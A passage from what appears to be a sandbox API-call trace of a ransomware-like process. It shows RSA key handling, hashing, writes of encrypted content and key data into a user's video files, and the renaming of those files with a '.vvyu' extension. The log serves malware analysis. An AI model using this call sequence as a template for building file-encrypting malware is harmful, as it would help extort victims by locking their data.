KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.090] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.091] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.091] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.091] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.091] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.091] GetLastError () returned 0x0 [0192.091] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0192.091] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.092] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.092] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.092] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12370) returned 0x2af5168 [0192.092] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a50 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a98 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.093] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6128 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6110 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0192.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.096] GetCurrentThreadId () returned 0x5d8 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae6fd8 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.097] GetCurrentThreadId () returned 0x5d8 [0192.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0192.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0192.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6128 [0192.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0192.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6188 [0192.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0192.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61a0 [0192.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6140 [0192.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6110 [0192.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0192.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0192.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0192.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0192.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0192.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0192.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3a98 | out: hHeap=0x2c0000) returned 1 [0192.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0192.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0192.111] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x12362, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x12362, lpOverlapped=0x0) returned 1 [0192.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.112] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12367, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.112] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0192.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0192.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.114] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0192.115] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.115] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.115] CloseHandle (hObject=0x584) returned 1 [0192.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0192.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0192.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0192.117] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\P0jIQb7.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\p0jiqb7.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\P0jIQb7.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\p0jiqb7.avi.vvyu")) returned 1 [0192.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.119] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.122] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb868c8a0, ftCreationTime.dwHighDateTime=0x1d8a40b, ftLastAccessTime.dwLowDateTime=0xdb6835e0, ftLastAccessTime.dwHighDateTime=0x1d8a6de, ftLastWriteTime.dwLowDateTime=0xdb6835e0, ftLastWriteTime.dwHighDateTime=0x1d8a6de, nFileSizeHigh=0x0, nFileSizeLow=0xcef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x7DOA nu7EAlTL.mkv", cAlternateFileName="X7DOAN~1.MKV")) returned 1 [0192.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a98 [0192.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0192.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3a98 | out: hHeap=0x2c0000) returned 1 [0192.122] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\x7DOA nu7EAlTL.mkv") returned=".mkv" [0192.122] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\x7DOA nu7EAlTL.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\x7doa nu7ealtl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.123] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=3311) returned 1 [0192.123] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.127] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.127] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 